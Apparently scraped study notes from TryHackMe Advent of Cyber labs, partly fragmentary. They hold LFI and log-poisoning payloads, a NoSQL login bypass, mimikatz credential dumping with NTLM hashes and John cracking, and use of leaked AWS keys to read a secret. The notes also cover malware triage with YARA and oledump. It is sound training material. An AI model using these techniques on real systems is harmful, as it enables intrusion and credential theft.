On good password policies for application developers: https://www.troyhunt.com/passwords-evolved-authentication-guidance-for-the-modern-era/#donotmandateregularpasswordchanges
), POST variables (hidden
fields), cookies (changing value).root@machine$ dirb -r /usr/share/dirb/wordlists/common.txt
Access to local files on server via webapp.
(lack of user sanitation), here file
is the entrypoint.# LFI http://example.com/page.php?file=/etc/passwd http://example.com/page.php?file=../../etc/passwd http://example.com/page.php?file=../../etc/passwd%00 http://example.com/page.php?file=..//..//etc/passwd http://example.com/page.php?file=..//..//etc/passwd http://example.com/page.php?file=%252e%252e%252fetc%252fpasswd # Using PHP filters http://example.thm.labs/page.php?file=php://filter/resource=/etc/passwd http://example.thm.labs/page.php?file=php://filter/read=string.rot13/resource=/etc/passwd http://example.thm.labs/page.php?file=php://filter/convert.base64-encode/resource=/etc/passwd # base64 tool to retrieve data $ echo "test string" | base64 dGVzdCBzdHJpbmcK # Inject PHP code in base64 encoding http://example.thm.labs/page.php?file=data://text/plain;base64,QW9DMyBpcyBmdW4hCg==
From LFI. Can achieved via log poisoning attack: injection of malicious payload into service log files (e.g. Apache, SSH), then use LFI to request the page (code execution).
For example, log files typically store different HTTP headers, including IP address, User-Agent, visited page, etc. Notably, User-Agent can be typically controlled by the user -> include PHP code into it, e.g.
$ curl -A "<?php phpinfo();?>" http://target// # this will be logged (but presented as plaintext by the log PHP)
Can also be achieved by PHP session data:
, /tmp/
, /var/lib/php5
, /var/lib/php/session
), to identify location of PHP session filessess_COOKIEVALUE
(COOKIEVALUE is found under DevTools > Application > Cookies > PHPSESSID). Since username stored in session info, can inject code into the field to execute it when using LFI to call up the session file.1. Inject ''<?php phpinfo();?>'' into the username field 2. Pull up the PHPSESSINFO and use LFI to call up session data, e.g. if session data is stored in ''/tmp'', then https://10-10-145-154.p.thmlabs.com/index.php?err=/tmp/sess_ooh7ljoelnji0qfmpv8pjd7914 will pull up the file.
Navigating the database, mongo
show databases
NoSQL (-p 2222) and MongoDB (-p 27017). Injection can be done via HTTP as well:
{username:"admin", password:{"$ne":"xyz"}}
PowerShell Transcription Logs we were able to remotely recover just after it went missing. You can find the transcription logs within the SantasLaptopLogs folder on the Desktop of the attached Windows virtual machine.
If you aren't familiar, PowerShell Transcription Logs capture the input and output of Windows PowerShell commands, allowing an analyst to review what happened when. Typically, PowerShell Transcription can be enabled by Group Policy, but another method to turn on this logging is by configuring the Windows Registry.
To enable transcription logging:
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\Transcription /v EnableTranscripting /t REG_DWORD /d 0x1 /f reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\Transcription /v OutputDirectory /t REG_SZ /d C:/ /f reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\Transcription /v EnableInvocationHeader /t REG_DWORD /d 0x1 /f
Wireshark syntax: https://en.wikipedia.org/wiki/Berkeley_Packet_Filter
Using nmap:
nmap -sT IP_ADDR # connect scan, complete 3-way TCP handshake nmap -sS IP_ADDR # sync scan, trigger handshake, but no SYN ACK nmap -sV ... # version info scan
Vulnerabilities lookup: https://httpd.apache.org/security/vulnerabilities_24.html
Scan all ports: nmap -sS -p1-65535 IP_ADDR
Scan for ports without an initial ping to check if reachable in the first place, useful for Windows:
nmap -Pn IP_ADDR
, i.e. sqsh -S server -U username -P password
enabled, can run DOS commands through it too: xp_cmdshell 'type "C:\Users\User\Desktop\hello.txt"'
Mounting NFS servers:
showmount -e
mkdir tmp1 && mount tmp1
umount tmp1
Privilege escalation in Windows/Linux. For the former, the following privilege levels are common:
Directly quoting from TryHackMe: A few common vectors that could allow any user to increase their privilege levels on a Windows system are listed below.
Ideally, McSkidy should explore all these. Privilege escalation does not have a silver bullet, and the vector that will work depends not only on the configuration of the target system but, in some cases, to user behaviour (e.g. finding a passwords.txt file on the desktop where the user notes his account passwords). In some cases, you will need to combine two or more vectors to achieve the desired result.
net users systeminfo # OS name/version wmic service list # list running services # See: Windows Privilege Escalation Room for more privilege escalation techniques
CI/CD pipeline is also prime target for privilege escalation:
stores actual encrypted passwordsOSINT research paper: https://arnoreuser.com/wp-content/uploads/2018/12/201712-The-RIS-OSINT-Intelligence-Cycle.pdf
or http://s3.amazonaws.com/BUCKETNAME/FILENAME.ext
Query bucket:
# curl http://irs-form-990.s3.amazonaws.com/ # aws s3 ls s3://irs-form-990/ --no-sign-request ... 2016-03-22 03:55:04 20714 201025093493004120_public.xml 2016-03-21 18:15:36 29137 201025093493004160_public.xml 2016-03-21 17:47:45 27786 201025093493005030_public.xml 2016-03-22 04:09:21 18801 201025093493005040_public.xml 2016-03-21 19:18:08 23287 201025093493005070_public.xml 2016-03-21 20:08:50 41583 201025093493005090_public.xml 2016-03-21 20:27:20 38653 201025093493005100_public.xml 2016-03-21 20:02:43 25711 201025093493005110_public.xml ...
curl http://irs-form-990.s3.amazonaws.com/201101319349101615_public.xml aws s3 cp s3://irs-form-990/201101319349101615_public.xml . --no-sign-request
Not a good idea to make buckets publicly writable: https://www.theregister.com/2018/02/22/la_times_amazon_aws_s3/
Authentication with IAM access keys = access key ID + secret access key (prefix AKIA), or session tokens (prefix ASIA).
Compromise strategy:
aws configure --profile PROFILENAME
(good practice to avoid default profile)aws s3 ls --profile PROFILE
aws sts get-access-key-info --access-key-id AKIAEXAMPLE
aws sts get-caller-identity --profile PROFILENAME
aws ec2 describe-instances --output text --profile PROFILENAME
aws ec2 describe-instances --output text --region us-east-1 --profile PROFILENAME
/* Add any custom values between this line and the "stop editing" line. */ define('S3_UPLOADS_BUCKET', 'images.bestfestivalcompany.com'); define('S3_UPLOADS_KEY', 'AKIAQI52OJVCPZXFYAOI'); define('S3_UPLOADS_SECRET', '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'); define('S3_UPLOADS_REGION', 'us-east-1'); root@ip-10-10-4-10:~/wp_backup# aws sts get-caller-identity --profile thm { "UserId": "AIDAQI52OJVCFHT3E73BO", "Account": "019181489476", "Arn": "arn:aws:iam::019181489476:user/ElfMcHR@bfc.com" } root@ip-10-10-4-10:~/wp_backup# aws ec2 describe-instances --output text --profile thm RESERVATIONS 019181489476 043234062703 r-0e89ba65b28a7c699 INSTANCES 0 x86_64 HR-Po-Insta-1NAKAMW2PPVMT False True xen ami-0c2b8ca1dad447f8a i-0c56041ac61cf5a95 t3a.micro hr-key 2021-11-13T12:36:58.000Z ip-172-31-68-81.ec2.internal /dev/xvda ebs True User initiated (2021-11-13 12:42:39 GMT) subnet-00b1107c0c18c0722 hvm vpc-0235b5a9591606b73 BLOCKDEVICEMAPPINGS /dev/xvda EBS 2021-11-13T12:36:59.000Z True attached vol-0ac79339aac8b249d CAPACITYRESERVATIONSPECIFICATION open CPUOPTIONS 1 2 HIBERNATIONOPTIONS False METADATAOPTIONS enabled 1 optional applied MONITORING disabled NETWORKINTERFACES interface 16:35:78:d8:60:d1 eni-027945da0ddb79e59 019181489476 ip-172-31-68-81.ec2.internal True in-use subnet-00b1107c0c18c0722 vpc-0235b5a9591606b73 ATTACHMENT 2021-11-13T12:36:58.000Z eni-attach-0d91e2137f6014220 True 0 attached GROUPS sg-0c6e7cd87c1c8d035 default PRIVATEIPADDRESSES True ip-172-31-68-81.ec2.internal PLACEMENT us-east-1f default SECURITYGROUPS sg-0c6e7cd87c1c8d035 default STATE 80 stopped STATEREASON Client.UserInitiatedShutdown Client.UserInitiatedShutdown: User initiated shutdown TAGS aws:cloudformation:stack-id arn:aws:cloudformation:us-east-1:019181489476:stack/HR-Portal/5ebc4e90-447e-11ec-a711-12d63f44d7b7 TAGS aws:cloudformation:logical-id Instance TAGS created_by Elf McHR TAGS aws:cloudformation:stack-name HR-Portal TAGS Name HR-Portal root@ip-10-10-4-10:~/wp_backup# aws secretsmanager help root@ip-10-10-4-10:~/wp_backup# aws secretsmanager list-secrets You must specify a region. You can also configure your region by running "aws configure". root@ip-10-10-4-10:~/wp_backup# aws secretsmanager list-secrets --profile thm { "SecretList": [ { "ARN": "arn:aws:secretsmanager:us-east-1:019181489476:secret:HR-Password-8AkWYF", "Name": "HR-Password", "Description": "Portal DB Secret", "LastChangedDate": 1637717347.812, "LastAccessedDate": 1639958400.0, "Tags": [ { "Key": "aws:cloudformation:stack-name", "Value": "HR-Portal" }, { "Key": "aws:cloudformation:logical-id", "Value": "FalseSecret" }, { "Key": "aws:cloudformation:stack-id", "Value": "arn:aws:cloudformation:us-east-1:019181489476:stack/HR-Portal/5ebc4e90-447e-11ec-a711-12d63f44d7b7" }, { "Key": "created_by", "Value": "Elf McHR" }, { "Key": "Name", "Value": "Payroll" } ], "SecretVersionsToStages": { "70630b3c-4fbe-4a24-885d-18445bd808b1": [ "AWSCURRENT" ], "a702190e-69f7-4a8a-81fd-3d20b486657a": [ "AWSPREVIOUS" ] } } ] } root@ip-10-10-4-10:~/wp_backup# aws secretsmanager get-secret-value --secret-id arn:aws:secretsmanager:us-east-1:019181489476:secret:HR-Password-8AkWYF --profile thm { "ARN": "arn:aws:secretsmanager:us-east-1:019181489476:secret:HR-Password-8AkWYF", "Name": "HR-Password", "VersionId": "70630b3c-4fbe-4a24-885d-18445bd808b1", "SecretString": "The Secret you're looking for is not in this **REGION**. Santa wants to have low latency to his databases. Look closer to where he lives.", "VersionStages": [ "AWSCURRENT" ], "CreatedDate": 1637717347.718 } root@ip-10-10-4-10:~/wp_backup# aws secretsmanager get-secret-value --secret-id arn:aws:secretsmanager:eu-north-1:019181489476:secret:HR-Password-KIJEvK --profile thm --region eu-north-1 { "ARN": "arn:aws:secretsmanager:eu-north-1:019181489476:secret:HR-Password-KIJEvK", "Name": "HR-Password", "VersionId": "f806c3cd-ea20-4a1a-948f-80927f3ad366", "SecretString": "Winter2021!", "VersionStages": [ "AWSCURRENT" ], "CreatedDate": 1636809979.996 }
Some tips:
ls -la
root@ip-10-10-20-249:~/aoc# docker save -o aoc.tar public.ecr.aws/h0w1j9u3/grinch-aoc:latest root@ip-10-10-20-249:~/aoc# tar -xvf aoc.tar 40ad0e404f6065a153d1b4d42e8b315be3504a08c21fadd6e5fde5982b45df18/ 40ad0e404f6065a153d1b4d42e8b315be3504a08c21fadd6e5fde5982b45df18/VERSION 40ad0e404f6065a153d1b4d42e8b315be3504a08c21fadd6e5fde5982b45df18/json 40ad0e404f6065a153d1b4d42e8b315be3504a08c21fadd6e5fde5982b45df18/layer.tar 4416e55edf1a706527e19102949972f4a8d89bbe2a45f917565ee9f3b08b7682/ 4416e55edf1a706527e19102949972f4a8d89bbe2a45f917565ee9f3b08b7682/VERSION 4416e55edf1a706527e19102949972f4a8d89bbe2a45f917565ee9f3b08b7682/json 4416e55edf1a706527e19102949972f4a8d89bbe2a45f917565ee9f3b08b7682/layer.tar 4cc7bdb0ea56d31f57a373d0e7ce0d633ae86dc327087fccf103c8d97f0cc9c4/ 4cc7bdb0ea56d31f57a373d0e7ce0d633ae86dc327087fccf103c8d97f0cc9c4/VERSION 4cc7bdb0ea56d31f57a373d0e7ce0d633ae86dc327087fccf103c8d97f0cc9c4/json 4cc7bdb0ea56d31f57a373d0e7ce0d633ae86dc327087fccf103c8d97f0cc9c4/layer.tar 4f62ae56d8d3b96d5fbe86da8a3f7bf6e9195d360b922cd7b162e17619c50664/ 4f62ae56d8d3b96d5fbe86da8a3f7bf6e9195d360b922cd7b162e17619c50664/VERSION 4f62ae56d8d3b96d5fbe86da8a3f7bf6e9195d360b922cd7b162e17619c50664/json 4f62ae56d8d3b96d5fbe86da8a3f7bf6e9195d360b922cd7b162e17619c50664/layer.tar 619ddb982b75f0eb6c9f48624e6a0d20be227e893599d8dea05dbdddc8b14e2b/ 619ddb982b75f0eb6c9f48624e6a0d20be227e893599d8dea05dbdddc8b14e2b/VERSION 619ddb982b75f0eb6c9f48624e6a0d20be227e893599d8dea05dbdddc8b14e2b/json 619ddb982b75f0eb6c9f48624e6a0d20be227e893599d8dea05dbdddc8b14e2b/layer.tar 9dedacd92213db743681db2e8d5b3247fd79ce266495d061a381c4c0441ce15d/ 9dedacd92213db743681db2e8d5b3247fd79ce266495d061a381c4c0441ce15d/VERSION 9dedacd92213db743681db2e8d5b3247fd79ce266495d061a381c4c0441ce15d/json 9dedacd92213db743681db2e8d5b3247fd79ce266495d061a381c4c0441ce15d/layer.tar a3c1e603ab4385e0b411423e70314651bb371561c45a2bc90951fa05da9ad3c4/ a3c1e603ab4385e0b411423e70314651bb371561c45a2bc90951fa05da9ad3c4/VERSION a3c1e603ab4385e0b411423e70314651bb371561c45a2bc90951fa05da9ad3c4/json a3c1e603ab4385e0b411423e70314651bb371561c45a2bc90951fa05da9ad3c4/layer.tar aa7f7d1cdeacc3a446e297814a6c13a42006dc8a99baad72c0c50383d69ac551/ aa7f7d1cdeacc3a446e297814a6c13a42006dc8a99baad72c0c50383d69ac551/VERSION aa7f7d1cdeacc3a446e297814a6c13a42006dc8a99baad72c0c50383d69ac551/json aa7f7d1cdeacc3a446e297814a6c13a42006dc8a99baad72c0c50383d69ac551/layer.tar f886f00520700e2ddd74a14856fcc07a360c819b4cea8cee8be83d4de01e9787.json fa28cd504eaba5e76b168c5149551371fbeb3bc0f51d18485fe401a411c2dd17/ fa28cd504eaba5e76b168c5149551371fbeb3bc0f51d18485fe401a411c2dd17/VERSION fa28cd504eaba5e76b168c5149551371fbeb3bc0f51d18485fe401a411c2dd17/json fa28cd504eaba5e76b168c5149551371fbeb3bc0f51d18485fe401a411c2dd17/layer.tar manifest.json repositories root@ip-10-10-20-249:~/aoc# cat manifest.json | jq [ { "Config": "f886f00520700e2ddd74a14856fcc07a360c819b4cea8cee8be83d4de01e9787.json", "RepoTags": [ "public.ecr.aws/h0w1j9u3/grinch-aoc:latest" ], "Layers": [ "a3c1e603ab4385e0b411423e70314651bb371561c45a2bc90951fa05da9ad3c4/layer.tar", "619ddb982b75f0eb6c9f48624e6a0d20be227e893599d8dea05dbdddc8b14e2b/layer.tar", "40ad0e404f6065a153d1b4d42e8b315be3504a08c21fadd6e5fde5982b45df18/layer.tar", "aa7f7d1cdeacc3a446e297814a6c13a42006dc8a99baad72c0c50383d69ac551/layer.tar", "4f62ae56d8d3b96d5fbe86da8a3f7bf6e9195d360b922cd7b162e17619c50664/layer.tar", "9dedacd92213db743681db2e8d5b3247fd79ce266495d061a381c4c0441ce15d/layer.tar", "fa28cd504eaba5e76b168c5149551371fbeb3bc0f51d18485fe401a411c2dd17/layer.tar", "4416e55edf1a706527e19102949972f4a8d89bbe2a45f917565ee9f3b08b7682/layer.tar", "4cc7bdb0ea56d31f57a373d0e7ce0d633ae86dc327087fccf103c8d97f0cc9c4/layer.tar" ] } ]
docker save image.tar [CONTAINER] tar -xf image.tar config.json cd [LAYER] +-- json +-- layer.tar | +-- root/ | +-- CACHED STUFF +-- VERSION
Email view source, to see encoding of attachment, e.g. base64.
Piping: cat [FILE] | base64 -d > password-reset-instructions.pdf
Of course, the magic headers: file [FILENAME]
on Linux
ubuntu@ip-10-10-31-202:~/Desktop/Samples$ file exmatter exmatter: PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows ubuntu@ip-10-10-31-202:~/Desktop/Samples$ file bizarro bizarro: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
See UTF8? strings in the source:
Indication of some SSH thing. md5sum
to compute MD5 hashes. Can use virustotal.com
to check MD5 hash:
ubuntu@ip-10-10-51-232:~/Desktop$ yara -s yaratest testfile eicaryara testfile 0x0:$a: X5O 0x1c:$b: EICAR 0x2b:$c: ANTIVIRUS 0x35:$d: TEST
oledump.py [FILENAME]
C:\Desktop\Tools>oledump.py Document1.doc 1: 114 '\x01CompObj' 2: 4096 '\x05DocumentSummaryInformation' 3: 4096 '\x05SummaryInformation' 4: 13859 '1Table' 5: 33430 'Data' 6: 365 'Macros/PROJECT' 7: 41 'Macros/PROJECTwm' 8: M 9852 'Macros/VBA/ThisDocument' # <- Macro 9: 5460 'Macros/VBA/_VBA_PROJECT' 10: 513 'Macros/VBA/dir'
Escalate privileges and maintaining persistence. Dumping passwords -> brute force clear text.
Windows uses Security Accounts Manager (SAM) to store passwords.
Local Security Authority Subsystem Service (LSASS) process retrieves from database, verifies password, then stores it in memory for convenience.
mimikatz to retrieve password hashes from memory.
PS C:\Users\Administrator\Desktop\mimikatz\x64> .\mimikatz.exe .#####. mimikatz 2.2.0 (x64) #19041 Aug 10 2021 17:19:53 .## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) ## \ / ## > https://blog.gentilkiwi.com/mimikatz '## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com ) '#####' > https://pingcastle.com / https://mysmartlogon.com ***/ mimikatz # privilege::debug Privilege '20' OK mimikatz # sekurlsa::logonpasswords Authentication Id : 0 ; 532161 (00000000:00081ec1) Session : Interactive from 0 User Name : emily Domain : THM Logon Server : THM Logon Time : 12/25/2021 3:33:17 AM SID : S-1-5-21-1966530601-3185510712-10604624-1009 msv : [00000003] Primary * Username : emily * Domain : THM * NTLM : 8af326aa4850225b75c592d4ce19ccf5 * SHA1 : 8c4c6c4e493ec2beef5f6f6a9c4472c13bed42e8 tspkg : wdigest : * Username : emily * Domain : THM * Password : (null) kerberos : * Username : emily * Domain : THM * Password : (null) ssp : credman : Authentication Id : 0 ; 443115 (00000000:0006c2eb) Session : RemoteInteractive from 2 User Name : Administrator Domain : THM Logon Server : THM Logon Time : 12/25/2021 3:33:11 AM SID : S-1-5-21-1966530601-3185510712-10604624-500 msv : [00000003] Primary * Username : Administrator * Domain : THM * NTLM : 001a5b3e266374c0df96a298f7f7419f * SHA1 : 6a6be7a1f14813295de2335bb8d1deadcfb57704 tspkg : wdigest : * Username : Administrator * Domain : THM * Password : (null) kerberos : * Username : Administrator * Domain : THM * Password : (null) ssp : credman : Authentication Id : 0 ; 421294 (00000000:00066dae) Session : Interactive from 2 User Name : UMFD-2 Domain : Font Driver Host Logon Server : (null) Logon Time : 12/25/2021 3:33:10 AM SID : S-1-5-96-0-2 msv : tspkg : wdigest : * Username : THM$ * Domain : WORKGROUP * Password : (null) kerberos : ssp : credman : Authentication Id : 0 ; 60236 (00000000:0000eb4c) Session : Interactive from 1 User Name : DWM-1 Domain : Window Manager Logon Server : (null) Logon Time : 12/25/2021 3:30:29 AM SID : S-1-5-90-0-1 msv : tspkg : wdigest : * Username : THM$ * Domain : WORKGROUP * Password : (null) kerberos : ssp : credman : Authentication Id : 0 ; 996 (00000000:000003e4) Session : Service from 0 User Name : THM$ Domain : WORKGROUP Logon Server : (null) Logon Time : 12/25/2021 3:30:28 AM SID : S-1-5-20 msv : tspkg : wdigest : * Username : THM$ * Domain : WORKGROUP * Password : (null) kerberos : * Username : thm$ * Domain : WORKGROUP * Password : (null) ssp : credman : Authentication Id : 0 ; 30650 (00000000:000077ba) Session : Interactive from 1 User Name : UMFD-1 Domain : Font Driver Host Logon Server : (null) Logon Time : 12/25/2021 3:30:28 AM SID : S-1-5-96-0-1 msv : tspkg : wdigest : * Username : THM$ * Domain : WORKGROUP * Password : (null) kerberos : ssp : credman : Authentication Id : 0 ; 421990 (00000000:00067066) Session : Interactive from 2 User Name : DWM-2 Domain : Window Manager Logon Server : (null) Logon Time : 12/25/2021 3:33:10 AM SID : S-1-5-90-0-2 msv : tspkg : wdigest : * Username : THM$ * Domain : WORKGROUP * Password : (null) kerberos : ssp : credman : Authentication Id : 0 ; 421974 (00000000:00067056) Session : Interactive from 2 User Name : DWM-2 Domain : Window Manager Logon Server : (null) Logon Time : 12/25/2021 3:33:10 AM SID : S-1-5-90-0-2 msv : tspkg : wdigest : * Username : THM$ * Domain : WORKGROUP * Password : (null) kerberos : ssp : credman : Authentication Id : 0 ; 997 (00000000:000003e5) Session : Service from 0 User Name : LOCAL SERVICE Domain : NT AUTHORITY Logon Server : (null) Logon Time : 12/25/2021 3:30:29 AM SID : S-1-5-19 msv : tspkg : wdigest : * Username : (null) * Domain : (null) * Password : (null) kerberos : * Username : (null) * Domain : (null) * Password : (null) ssp : credman : Authentication Id : 0 ; 60255 (00000000:0000eb5f) Session : Interactive from 1 User Name : DWM-1 Domain : Window Manager Logon Server : (null) Logon Time : 12/25/2021 3:30:29 AM SID : S-1-5-90-0-1 msv : tspkg : wdigest : * Username : THM$ * Domain : WORKGROUP * Password : (null) kerberos : ssp : credman : Authentication Id : 0 ; 30699 (00000000:000077eb) Session : Interactive from 0 User Name : UMFD-0 Domain : Font Driver Host Logon Server : (null) Logon Time : 12/25/2021 3:30:28 AM SID : S-1-5-96-0-0 msv : tspkg : wdigest : * Username : THM$ * Domain : WORKGROUP * Password : (null) kerberos : ssp : credman : Authentication Id : 0 ; 29509 (00000000:00007345) Session : UndefinedLogonType from 0 User Name : (null) Domain : (null) Logon Server : (null) Logon Time : 12/25/2021 3:30:28 AM SID : msv : tspkg : wdigest : kerberos : ssp : credman : Authentication Id : 0 ; 999 (00000000:000003e7) Session : UndefinedLogonType from 0 User Name : THM$ Domain : WORKGROUP Logon Server : (null) Logon Time : 12/25/2021 3:30:28 AM SID : S-1-5-18 msv : tspkg : wdigest : * Username : THM$ * Domain : WORKGROUP * Password : (null) kerberos : * Username : thm$ * Domain : WORKGROUP * Password : (null) ssp : credman : mimikatz #
After which, use the rockyou.txt
wordlist to test, using John the Ripper: john --format=NT -w=rockyou.txt hash.txt --pot=output.txt
: RDP (from freerdp2-x11
:git clone https://gitlab.com/kalilinux/packages/dirbuster.git /opt/dirbuster && sudo /opt/dirbuster/DirBuster-1.0-RC1.sh
alias dirbuster="source /opt/dirbuster/DirBuster-1.0-RC1.sh"
to ~/.bash_aliases
java -Xmx256M -jar /opt/dirbuster/DirBuster-1.0-RC1.jar
sudo apt install openjdk-13-jre-headless
OLEdump: https://blog.didierstevens.com/programs/oledump-py/
oledump.py [FILENAME] -s 8 -S
dumps stream 8 strings
Powershell logs can view via Event Viewer, or Full Event Log View (by NirSoft)
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